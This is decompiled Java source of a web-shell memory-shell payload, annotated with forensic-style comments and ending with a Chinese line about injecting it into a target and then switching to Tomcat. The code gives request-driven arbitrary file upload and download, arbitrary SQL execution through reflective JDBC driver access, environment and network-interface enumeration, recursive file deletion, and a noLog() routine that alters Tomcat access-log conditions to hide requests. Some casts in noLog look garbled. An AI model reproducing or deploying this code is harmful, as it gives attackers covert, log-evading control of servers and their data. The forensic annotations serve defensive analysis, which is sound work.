int var33 = var10.executeUpdate(var7); var10.close(); var9.close(); var8.put("errMsg", "Query OK, " + var33 + " rows affected"); } } catch (Exception var31) { var8.put("errMsg", 
// Tail of a method whose beginning lies before this excerpt; reproduced unchanged.
// The visible part only stores error text under "errMsg" and returns this.serialize(var8).
var31.getMessage());
            }
        } else {
            var8.put("errMsg", "This database is not supported");
        }
    } catch (Exception var32) {
        var8.put("errMsg", var32.getMessage());
    }
} else {
    var8.put("errMsg", "No parameter dbType,dbHost,dbPort,dbUsername,dbPassword,execType,execSql");
}
return this.serialize(var8);
}

// Analyst note for the listing below: this is decompiler output of the payload recovered
// from the capture. The recurring "class$N == null ? Class.forName(...)" blocks look like
// compiler-generated class-literal caches (presumably built for an old class-file target);
// read each one as a plain class literal such as Map.class or String.class.

/**
 * Tears down session state kept in the static-looking {@code sessionMap}.
 *
 * With a "sessionId" parameter: removes that entry and sets its "alive" key to FALSE.
 * Without one, but with operation == "clearup": sets "alive" to FALSE on every Map-valued
 * entry and then empties the whole map. Anything else yields "fail".
 *
 * @return the bytes of "ok", "fail", or the message of any exception that was caught
 */
public byte[] close() {
    try {
        String var1 = this.sessionId();
        String var2 = this.get("operation");
        if (var1 != null) {
            Map var7 = (Map)sessionMap.remove(var1);
            var7.put("alive", Boolean.FALSE);
            return "ok".getBytes();
        } else if (var2 != null && "clearup".equals(var2)) {
            Iterator var3 = sessionMap.values().iterator();

            while(var3.hasNext()) {
                Object var4 = var3.next();
                // Class-literal cache for java.util.Map (see the note above close()).
                Class var10000 = class$0;
                if (var10000 == null) {
                    try {
                        var10000 = Class.forName("java.util.Map");
                    } catch (ClassNotFoundException var5) {
                        throw new NoClassDefFoundError(var5.getMessage());
                    }

                    class$0 = var10000;
                }

                if (var10000.isInstance(var4)) {
                    ((Map)var4).put("alive", Boolean.FALSE);
                }
            }

            sessionMap.clear();
            return "ok".getBytes();
        } else {
            return "fail".getBytes();
        }
    } catch (Exception var6) {
        return var6.getMessage().getBytes();
    }
}

/**
 * Writes one chunk of request-supplied bytes ("fileContents") to the target named by
 * "fileName", at the offset given by "position" (0 when the parameter is absent).
 *
 * Three destinations are visible:
 *  - names starting with "mem://": an in-memory ByteArrayOutputStream kept in this.session,
 *    created when the offset is 0 and appended to otherwise;
 *  - no position (or no RandomAccessFile(String, String) constructor): append to the file;
 *  - otherwise: open the file "rw" via RandomAccessFile, seek to the offset and write.
 *
 * Forensic relevance: the path is taken from the request as-is, with no restriction visible
 * in this method, so any location writable by the servlet container's account can be
 * touched. File-creation and modification times under that account are worth correlating
 * with the request timestamps in the capture.
 *
 * @return the bytes of "ok", or "Exception errMsg:" followed by the exception message
 */
public byte[] bigFileUpload() {
    String var1 = this.get("fileName");
    byte[] var2 = this.getByteArray("fileContents");
    String var3 = this.get("position");
    String var4 = "mem://";
    int var5 = var3 == null ? 0 : Integer.parseInt(var3);
    Constructor var6 = null;

    try {
        try {
            // Resolves the RandomAccessFile(String, String) constructor reflectively.
            Class var10000 = class$8;
            if (var10000 == null) {
                try {
                    var10000 = Class.forName("java.io.RandomAccessFile");
                } catch (ClassNotFoundException var11) {
                    throw new NoClassDefFoundError(var11.getMessage());
                }

                class$8 = var10000;
            }

            Class[] var10001 = new Class[2];
            Class var10004 = class$3;
            if (var10004 == null) {
                try {
                    var10004 = Class.forName("java.lang.String");
                } catch (ClassNotFoundException var10) {
                    throw new NoClassDefFoundError(var10.getMessage());
                }

                class$3 = var10004;
            }

            var10001[0] = var10004;
            var10004 = class$3;
            if (var10004 == null) {
                try {
                    var10004 = Class.forName("java.lang.String");
                } catch (ClassNotFoundException var9) {
                    throw new NoClassDefFoundError(var9.getMessage());
                }

                class$3 = var10004;
            }

            var10001[1] = var10004;
            var6 = var10000.getConstructor(var10001);
        } catch (NoSuchMethodException var12) {
            // Clearing the position string selects the append branch below.
            var3 = null;
        }

        if (var1.startsWith(var4)) {
            if (var5 == 0) {
                this.session.put(var1, new ByteArrayOutputStream());
            }

            ByteArrayOutputStream var7 = (ByteArrayOutputStream)this.session.get(var1);
            var7.write(var2);
        } else if (var3 == null) {
            // Second constructor argument "true" opens the file in append mode.
            FileOutputStream var14 = new FileOutputStream(var1, true);
            var14.write(var2);
            var14.flush();
            var14.close();
        } else {
            RandomAccessFile var15 = (RandomAccessFile)var6.newInstance(var1, "rw");
            var15.seek((long)var5);
            var15.write(var2);
            var15.close();
        }

        return "ok".getBytes();
    } catch (Exception var13) {
        StringBuffer var8 = new StringBuffer();
        var8.append("Exception errMsg:");
        var8.append(var13.getMessage());
        return var8.toString().getBytes();
    }
}

/**
 * Returns either the size of a file or one chunk of its content, selected by "mode".
 *
 *  - mode "fileSize": the length of File(fileName), as a decimal string;
 *  - mode "read": skips "position" bytes, then reads up to "readByteNum" bytes from either
 *    an InputStream stored in this.session (names starting with "mem://") or the file;
 *  - any other mode: the literal "no mode".
 *
 * Forensic relevance: like the upload counterpart, the path comes straight from the
 * request, so responses to these calls may carry arbitrary readable files. Response sizes
 * in the capture bound how much data left the host per request.
 *
 * @return the requested bytes, or "Exception errMsg:" followed by the exception message
 */
public byte[] bigFileDownload() {
    String var1 = this.get("fileName");
    String var2 = this.get("mode");
    String var3 = this.get("readByteNum");
    String var4 = this.get("position");
    String var5 = "mem://";

    try {
        if ("fileSize".equals(var2)) {
            return String.valueOf((new File(var1)).length()).getBytes();
        } else if ("read".equals(var2)) {
            int var6 = Integer.valueOf(var4);
            int var12 = Integer.valueOf(var3);
            byte[] var8 = new byte[var12];
            Object var9 = null;
            if (var1.startsWith(var5)) {
                var9 = (InputStream)this.session.get(var1);
            } else {
                var9 = new FileInputStream(var1);
            }

            ((InputStream)var9).skip((long)var6);
            int var10 = ((InputStream)var9).read(var8);
            ((InputStream)var9).close();
            // A short read is trimmed to the number of bytes actually returned by read().
            return var10 == var8.length ? var8 : copyOf(var8, var10);
        } else {
            return "no mode".getBytes();
        }
    } catch (Exception var11) {
        StringBuffer var7 = new StringBuffer();
        var7.append("Exception errMsg:");
        var7.append(var11.getMessage());
        return var7.toString().getBytes();
    }
}

/**
 * Copies {@code var0} into a new array of length {@code var1}, truncating or leaving the
 * remainder zero-filled. Local stand-in for Arrays.copyOf.
 */
public static byte[] copyOf(byte[] var0, int var1) {
    byte[] var2 = new byte[var1];
    System.arraycopy(var0, 0, var2, 0, Math.min(var0.length, var1));
    return var2;
}

/**
 * Reflectively calls the no-argument System.getenv() and returns its result.
 *
 * @return the environment map, or null if anything at all is thrown
 */
public Map getEnv() {
    try {
        Class var10000 = class$9;
        if (var10000 == null) {
            try {
                var10000 = Class.forName("java.lang.System");
            } catch (ClassNotFoundException var1) {
                throw new NoClassDefFoundError(var1.getMessage());
            }

            class$9 = var10000;
        }

        return (Map)var10000.getMethod("getenv").invoke((Object)null);
    } catch (Throwable var2) {
        return null;
    }
}

/**
 * Opens a JDBC connection without going through DriverManager.getConnection().
 *
 * It reflects over DriverManager's declared fields for one whose name contains "rivers" and
 * whose type is assignable to List, makes it accessible, and iterates the entries. For an
 * entry that is not itself a java.sql.Driver, it looks for a Driver-typed field inside the
 * entry and calls Driver.connect(url, props) on it, stopping at the first non-null result.
 *
 * Forensic relevance: every exception is swallowed here, so failed attempts leave no trace
 * from this code. Database-side audit logs and outbound connections from the application
 * server are the places to look for use of this method.
 *
 * @param var0 JDBC URL passed to Driver.connect
 * @param var1 value stored under the "user" property when not null
 * @param var2 value stored under the "password" property when not null
 * @return the first connection obtained, or null
 */
public static Connection getConnection(String var0, String var1, String var2) {
    Connection var3 = null;

    try {
        Class var10000 = class$10;
        if (var10000 == null) {
            try {
                var10000 = Class.forName("java.sql.DriverManager");
            } catch (ClassNotFoundException var15) {
                throw new NoClassDefFoundError(var15.getMessage());
            }

            class$10 = var10000;
        }

        Field[] var4 = var10000.getDeclaredFields();
        Field var5 = null;

        // Leaves var5 pointing at the matching field, or null when none matches.
        for(int var6 = 0; var6 < var4.length; ++var6) {
            var5 = var4[var6];
            if (var5.getName().indexOf("rivers") != -1) {
                var10000 = class$11;
                if (var10000 == null) {
                    try {
                        var10000 = Class.forName("java.util.List");
                    } catch (ClassNotFoundException var14) {
                        throw new NoClassDefFoundError(var14.getMessage());
                    }

                    class$11 = var10000;
                }

                if (var10000.isAssignableFrom(var5.getType())) {
                    break;
                }
            }

            var5 = null;
        }

        if (var5 != null) {
            var5.setAccessible(true);
            List var18 = (List)var5.get((Object)null);
            Iterator var7 = var18.iterator();

            while(var7.hasNext() && var3 == null) {
                try {
                    Object var8 = var7.next();
                    Driver var9 = null;
                    var10000 = class$12;
                    if (var10000 == null) {
                        try {
                            var10000 = Class.forName("java.sql.Driver");
                        } catch (ClassNotFoundException var13) {
                            throw new NoClassDefFoundError(var13.getMessage());
                        }

                        class$12 = var10000;
                    }

                    if (!var10000.isAssignableFrom(var8.getClass())) {
                        // Entry is a wrapper object: pull the Driver out of its first
                        // Driver-typed declared field.
                        Field[] var10 = var8.getClass().getDeclaredFields();

                        for(int var11 = 0; var11 < var10.length; ++var11) {
                            var10000 = class$12;
                            if (var10000 == null) {
                                try {
                                    var10000 = Class.forName("java.sql.Driver");
                                } catch (ClassNotFoundException var12) {
                                    throw new NoClassDefFoundError(var12.getMessage());
                                }

                                class$12 = var10000;
                            }

                            if (var10000.isAssignableFrom(var10[var11].getType())) {
                                var10[var11].setAccessible(true);
                                var9 = (Driver)var10[var11].get(var8);
                                break;
                            }
                        }
                    }

                    if (var9 != null) {
                        Properties var19 = new Properties();
                        if (var1 != null) {
                            var19.put("user", var1);
                        }

                        if (var2 != null) {
                            var19.put("password", var2);
                        }

                        var3 = var9.connect(var0, var19);
                    }
                } catch (Exception var16) {
                    // Swallowed: the loop simply moves on to the next registered entry.
                }
            }
        }
    } catch (Exception var17) {
        // Swallowed: the caller only ever sees a null connection.
    }

    return var3;
}

/**
 * Returns the "sessionId" request parameter decoded with the platform default charset,
 * or null when the parameter is absent.
 */
public String sessionId() {
    byte[] var1 = this.getByteArray("sessionId");
    return var1 != null ? new String(var1) : null;
}

/**
 * Lists the host addresses of all network interfaces as a bracketed, comma-separated
 * string such as "[a,b]" ("[]" when none could be read).
 *
 * NetworkInterface is reached through reflection; any Throwable is swallowed, in which
 * case whatever was collected up to that point is returned.
 */
public static String getLocalIPList() {
    ArrayList var0 = new ArrayList();

    try {
        Class var1 = Class.forName("java.net.NetworkInterface");
        Method var2 = var1.getMethod("getNetworkInterfaces");
        Method var3 = var1.getMethod("getInetAddresses");
        Enumeration var4 = (Enumeration)var2.invoke((Object)null);

        while(var4.hasMoreElements()) {
            Object var5 = var4.nextElement();
            Enumeration var6 = (Enumeration)var3.invoke(var5);

            while(var6.hasMoreElements()) {
                InetAddress var7 = (InetAddress)var6.nextElement();
                if (var7 != null) {
                    String var8 = var7.getHostAddress();
                    var0.add(var8);
                }
            }
        }
    } catch (Throwable var9) {
    }

    Iterator var10 = var0.iterator();
    StringBuffer var11 = new StringBuffer();
    var11.append("[");

    while(var10.hasNext()) {
        Object var12 = var10.next();
        var11.append(var12.toString());
        var11.append(",");
    }

    // Drops the trailing comma when at least one address was appended.
    if (var11.length() > 1) {
        var11.deleteCharAt(var11.length() - 1);
    }

    var11.append("]");
    return var11.toString();
}

/**
 * Resolves the web application's root directory on disk.
 *
 * Default is the process working directory plus "/". When this.servletRequest is set, it
 * reflectively calls getServletContext() on it and then getRealPath("/") on the context,
 * returning that value when it is not null. Any Throwable falls back to the default.
 */
public String getRealPath() {
    String var1 = (new File("")).getAbsoluteFile() + "/";
    if (this.servletRequest != null) {
        try {
            Method var2 = this.getMethodByClass(this.servletRequest.getClass(), "getServletContext", new Class[0]);
            Object var3 = var2.invoke(this.servletRequest, (Object[])null);
            if (var3 != null) {
                Class var4 = var3.getClass();
                Class[] var5 = new Class[1];
                Class var10002 = class$3;
                if (var10002 == null) {
                    try {
                        var10002 = Class.forName("java.lang.String");
                    } catch (ClassNotFoundException var8) {
                        throw new NoClassDefFoundError(var8.getMessage());
                    }

                    class$3 = var10002;
                }

                var5[0] = var10002;
                Method var6 = this.getMethodByClass(var4, "getRealPath", var5);
                if (var6 != null) {
                    Object var7 = var6.invoke(var3, "/");
                    return var7 != null ? var7.toString() : var1;
                }
            }
        } catch (Throwable var9) {
        }
    }

    return var1;
}

/**
 * Deletes {@code var1}; for a directory, first recurses into every entry returned by
 * listFiles(). The boolean result of File.delete() is not checked.
 */
public void deleteFiles(File var1) throws Exception {
    if (var1.isDirectory()) {
        File[] var2 = var1.listFiles();

        for(int var3 = 0; var3 < var2.length; ++var3) {
            File var4 = var2[var3];
            this.deleteFiles(var4);
        }
    }

    var1.delete();
}

/**
 * Calls method {@code var2} on object {@code var1} by reflection.
 *
 * Parameter types are derived from the runtime classes of the arguments (null arguments
 * contribute a null type), and the method is looked up with getMethodByClass.
 *
 * @return the invocation result, or null if the lookup or the call throws
 */
Object invoke(Object var1, String var2, Object[] var3) {
    try {
        ArrayList var4 = new ArrayList();
        if (var3 != null) {
            for(int var5 = 0; var5 < var3.length; ++var5) {
                Object var6 = var3[var5];
                if (var6 != null) {
                    var4.add(var6.getClass());
                } else {
                    var4.add((Object)null);
                }
            }
        }

        Method var8 = this.getMethodByClass(var1.getClass(), var2, (Class[])var4.toArray(new Class[0]));
        return var8.invoke(var1, var3);
    } catch (Exception var7) {
        return null;
    }
}

/**
 * Finds a declared method by name and parameter types, starting at {@code var1} and
 * walking up the superclass chain.
 *
 * @return the first match, or null when no class in the chain declares it
 */
Method getMethodByClass(Class var1, String var2, Class[] var3) {
    Method var4 = null;

    while(var1 != null) {
        try {
            var4 = var1.getDeclaredMethod(var2, var3);
            // Setting the cursor to null ends the walk once a match is found.
            var1 = null;
        } catch (Exception var5) {
            var1 = var1.getSuperclass();
        }
    }

    return var4;
}

/**
 * Reads a field from {@code var0} regardless of its access modifier.
 *
 * The field named {@code var1} is searched in the object's class and its superclasses
 * (or {@code var0} itself is used when it already is a Field), made accessible, and read.
 * This is the helper noLog() uses to reach the container's private "context" fields.
 */
public static Object getFieldValue(Object var0, String var1) throws Exception {
    Field var2 = null;
    if (var0 instanceof Field) {
        var2 = (Field)var0;
    } else {
        Class var3 = var0.getClass();

        while(var3 != null) {
            try {
                var2 = var3.getDeclaredField(var1);
                var3 = null;
            } catch (Exception var4) {
                var3 = var3.getSuperclass();
            }
        }
    }

    var2.setAccessible(true);
    return var2.get(var0);
}

/**
 * Reads from {@code var1} into a new buffer of {@code var2} bytes, looping on read() and
 * accumulating its return value until that total reaches the buffer length.
 * An IOException ends the loop silently; the buffer is returned either way.
 */
private byte[] readInputStream(InputStream var1, int var2) {
    byte[] var3 = new byte[var2];
    int var4 = 0;

    try {
        while((var4 += var1.read(var3, var4, var3.length - var4)) < var3.length) {
        }
    } catch (IOException var5) {
    }

    return var3;
}

/**
 * Builds a random identifier of {@code var0 + 1} characters: one ASCII letter followed by
 * {@code var0} characters drawn from letters and digits, using a fresh Random instance.
 */
public static String getRandomString(int var0) {
    String var1 = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    Random var2 = new Random();
    StringBuffer var3 = new StringBuffer();
    // First character is restricted to the 52 letters.
    var3.append(var1.charAt(var2.nextInt(52)));
    var1 = var1 + "0123456789";

    for(int var4 = 0; var4 < var0; ++var4) {
        int var5 = var2.nextInt(62);
        var3.append(var1.charAt(var5));
    }

    return var3.toString();
}
/**
 * Access-log tampering routine; the name and the "FuckLog" default both point at log
 * suppression.
 *
 * What the visible code does: starting from the object passed in (presumably the servlet
 * request), it calls getServletContext(), reads two nested private "context" fields to reach
 * a container object, and collects that object plus every ancestor returned by getParent().
 * For each collected container it walks the chain getPipeline() / getFirst() / getNext().
 * On a chain element that exposes both getCondition() and setCondition(String), it reads
 * the current condition, substitutes "FuckLog" when none is set, writes it back, and then
 * goes on to look up a two-String setAttribute method on the request's class.
 *
 * Why it matters to a responder: getCondition/setCondition match the conditional-logging
 * attribute of Tomcat's access-log valve (inferred from the method names and the
 * org.apache.catalina.Valve check; confirm against the deployed Tomcat version). If the
 * routine succeeds, requests carrying the matching attribute would be missing from the
 * access log, so the absence of log entries does not rule out activity. Cross-check with
 * packet captures, reverse-proxy or load-balancer logs, and inspect the running valve
 * configuration for an unexpected condition value such as the literal used here.
 *
 * NOTE(review): some casts and invocation targets in the inner branch look inconsistent
 * with the surrounding logic, which may be a decompiler artefact; treat this listing as
 * approximate and confirm against the bytecode before drawing conclusions.
 * All exceptions are swallowed, so the routine never reports failure.
 */
private void noLog(Object var1) {
    try {
        Method var2 = this.getMethodByClass(var1.getClass(), "getServletContext", (Class[])null);
        Object var3 = var2.invoke(var1, (Object[])null);
        // Two hops through private fields named "context" to reach the container object.
        Object var4 = getFieldValue(var3, "context");
        Object var5 = getFieldValue(var4, "context");

        ArrayList var6;
        // Collects the container and each ancestor reported by getParent().
        for(var6 = new ArrayList(); var5 != null; var5 = this.invoke(var5, "getParent", (Object[])null)) {
            var6.add(var5);
        }

        label84:
        for(int var7 = 0; var7 < var6.size(); ++var7) {
            try {
                Object var8 = this.invoke(var6.get(var7), "getPipeline", (Object[])null);
                if (var8 != null) {
                    Object var9 = this.invoke(var8, "getFirst", (Object[])null);

                    while(true) {
                        while(true) {
                            // End of this pipeline's chain: move on to the next container.
                            if (var9 == null) {
                                continue label84;
                            }

                            if (this.getMethodByClass(var9.getClass(), "getCondition", (Class[])null) != null) {
                                Class var10001 = var9.getClass();
                                Class[] var10003 = new Class[1];
                                Class var10006 = class$3;
                                if (var10006 == null) {
                                    try {
                                        var10006 = Class.forName("java.lang.String");
                                    } catch (ClassNotFoundException var14) {
                                        throw new NoClassDefFoundError(var14.getMessage());
                                    }

                                    class$3 = var10006;
                                }

                                var10003[0] = var10006;
                                if (this.getMethodByClass(var10001, "setCondition", var10003) != null) {
                                    String var10 = (String)this.invoke((String)var9, "getCondition", new Object[0]);
                                    // Keeps an existing condition name; otherwise uses the hard-coded default.
                                    var10 = var10 == null ? "FuckLog" : var10;
                                    this.invoke(var9, "setCondition", new Object[]{var10});
                                    var10001 = var1.getClass();
                                    var10003 = new Class[2];
                                    var10006 = class$3;
                                    if (var10006 == null) {
                                        try {
                                            var10006 = Class.forName("java.lang.String");
                                        } catch (ClassNotFoundException var13) {
                                            throw new NoClassDefFoundError(var13.getMessage());
                                        }

                                        class$3 = var10006;
                                    }

                                    var10003[0] = var10006;
                                    var10006 = class$3;
                                    if (var10006 == null) {
                                        try {
                                            var10006 = Class.forName("java.lang.String");
                                        } catch (ClassNotFoundException var12) {
                                            throw new NoClassDefFoundError(var12.getMessage());
                                        }

                                        class$3 = var10006;
                                    }

                                    var10003[1] = var10006;
                                    Method var11 = this.getMethodByClass(var10001, "setAttribute", var10003);
                                    var11.invoke(var10, var10);
                                    var9 = this.invoke(var9, "getNext", (Object[])null);
                                    continue;
                                }
                            }

                            // Any other element: keep walking only while it is a Catalina Valve.
                            if (Class.forName("org.apache.catalina.Valve", false, var4.getClass().getClassLoader()).isAssignableFrom(var9.getClass())) {
                                var9 = this.invoke(var9, "getNext", (Object[])null);
                            } else {
                                var9 = null;
                            }
                        }
                    }
                }
            } catch (Exception var15) {
                // Swallowed: a failure on one container does not stop the outer loop.
            }
        }
    } catch (Exception var16) {
        // Swallowed: the caller gets no indication of whether anything was changed.
    }

}

/**
 * Decodes the first four bytes of {@code var0} as a little-endian 32-bit integer
 * (index 0 is the least significant byte).
 */
public static int bytesToInt(byte[] var0) {
    int var1 = var0[0] & 255 | (var0[1] & 255) << 8 | (var0[2] & 255) << 16 | (var0[3] & 255) << 24;
    return var1;
}

/**
 * Encodes {@code var0} as four bytes in little-endian order; inverse of bytesToInt.
 */
public static byte[] intToBytes(int var0) {
    byte[] var1 = new byte[]{(byte)(var0 & 255), (byte)(var0 >> 8 & 255), (byte)(var0 >> 16 & 255), (byte)(var0 >> 24 & 255)};
    return var1;
}

/**
 * Self-contained Base64 encoder with '=' padding (byte value 61).
 *
 * The alphabet is read from the {@code toBase64} field, which is declared outside this
 * excerpt, so whether it is the standard alphabet cannot be confirmed from here. No JDK
 * Base64 class is referenced in this method. The constants var5 = -1 and var6 = true make
 * the line-length branch dead and padding always on.
 *
 * @param var1 bytes to encode
 * @return the encoded text, built from the output bytes with the platform default charset
 */
public String base64Encode(byte[] var1) {
    byte var2 = 0;
    int var3 = var1.length;
    // Output size: four characters for every started group of three input bytes.
    byte[] var4 = new byte[4 * ((var1.length + 2) / 3)];
    byte var5 = -1;
    boolean var6 = true;
    char[] var7 = toBase64;
    int var8 = var2;
    // var9 / var10: length and end index of the part that consists of whole 3-byte groups.
    int var9 = (var3 - var2) / 3 * 3;
    int var10 = var2 + var9;
    if (var5 > 0 && var9 > var5 / 4 * 3) {
        var9 = var5 / 4 * 3;
    }

    int var11;
    int var12;
    int var13;
    for(var11 = 0; var8 < var10; var8 = var12) {
        var12 = Math.min(var8 + var9, var10);
        var13 = var8;

        int var15;
        // Each iteration packs three input bytes into 24 bits and emits four characters;
        // the fourth one is written by the loop's update expression.
        for(int var14 = var11; var13 < var12; var4[var14++] = (byte)var7[var15 & 63]) {
            var15 = (var1[var13++] & 255) << 16 | (var1[var13++] & 255) << 8 | var1[var13++] & 255;
            var4[var14++] = (byte)var7[var15 >>> 18 & 63];
            var4[var14++] = (byte)var7[var15 >>> 12 & 63];
            var4[var14++] = (byte)var7[var15 >>> 6 & 63];
        }

        var13 = (var12 - var8) / 3 * 4;
        var11 += var13;
    }

    // Remaining one or two input bytes, padded with '=' to a full four-character group.
    if (var8 < var3) {
        var12 = var1[var8++] & 255;
        var4[var11++] = (byte)var7[var12 >> 2];
        if (var8 == var3) {
            var4[var11++] = (byte)var7[var12 << 4 & 63];
            if (var6) {
                var4[var11++] = 61;
                var4[var11++] = 61;
            }
        } else {
            var13 = var1[var8++] & 255;
            var4[var11++] = (byte)var7[var12 << 4 & 63 | var13 >> 4];
            var4[var11++] = (byte)var7[var13 << 2 & 63];
            if (var6) {
                var4[var11++] = 61;
            }
        }
    }

    return new String(var4);
}
// Closes the decompiled class, whose header is outside this excerpt.
}
我们将上述内存马打进去后,没有任何反应,
于是尝试切换 Tomcat 进行解析。